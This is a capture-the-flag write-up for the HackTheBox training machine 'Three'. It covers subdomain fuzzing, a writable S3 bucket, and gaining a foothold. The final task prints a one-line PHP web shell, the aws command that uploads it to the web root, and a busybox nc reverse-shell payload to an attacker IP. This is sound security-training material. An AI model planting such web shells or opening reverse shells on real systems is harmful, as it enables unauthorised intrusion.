Starting Point HackTheBox
Machine name: Three
Task 1
- How many TCP ports are open?
First Let’s scan the target
Answer: 2
Task 2
- What is the domain of the email address provided in the “Contact” section of the website?
Going over to the web page shows this
Checking the Contact page shows this email address
We can see the domain name
Answer: thetoppers.htb
Task 3
- In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
For this we need to edit our /etc/hosts file so that it can resolve the hostname to ip address
Answer: /etc/hosts
Task 4
- Which sub-domain is discovered during further enumeration?
Let us fuzz for subdomain using ffuf
We see that the result shows that the s3 sub domain is up
So i’ll add s3.thetoppers.htb to my /etc/hosts file
Answer: s3.thetoppers.htb
Task 5
- Which service is running on the discovered sub-domain?
Since we see the sub domain name looks interesting i’ll search it up on google
From the result we can tell the answer is Amazon S3
Answer: Amazon S3
Task 6
- Which command line utility can be used to interact with the service running on the discovered sub-domain?
Searching google for this gives the answer
Answer: awscli
Task 7
- Which command is used to set up the AWS CLI installation?
I installed aws tool from here
So to set up aws we use aws configure
Answer: aws configure
Task 8
- What is the command used by the above utility to list all of the S3 buckets?
To list all of the S3 bucket we use:
Answer: aws s3 ls
But doing that on the target shows this
It is trying to access the main amazon aws endpoint
But we just need to reference it to the endpoint already give to us
So I did this
Cool we see the index.php & .htaccess file
Task 9
- This server is configured to run files written in what web scripting language?
Back to the web app
Using wappalyzer shows the language of the web server
Answer: PHP
Task 10
- Submit the root flag
Since we know the aws allows write access we can put files to the aws
But let us first download the index.php file
Opening it shows it is the web root directory of the web server on port 80
Cool. So this means we can upload our own file to the server
I created a file with this content names shell.php
<?php system($_GET['cmd']); ?>
Now i uploaded it to the aws
aws s3 --endpoint http://s3.thetoppers.htb cp shell.php s3://thetoppers.htb/
Our shell is uploaded we can now access it from the web server
We are user www-data let’s get a reverse shell
Payload: http://thetoppers.htb/shell.php?cmd=busybox%20nc%2010.10.14.27%201337%20-e%20/bin/bash
The flag is there :)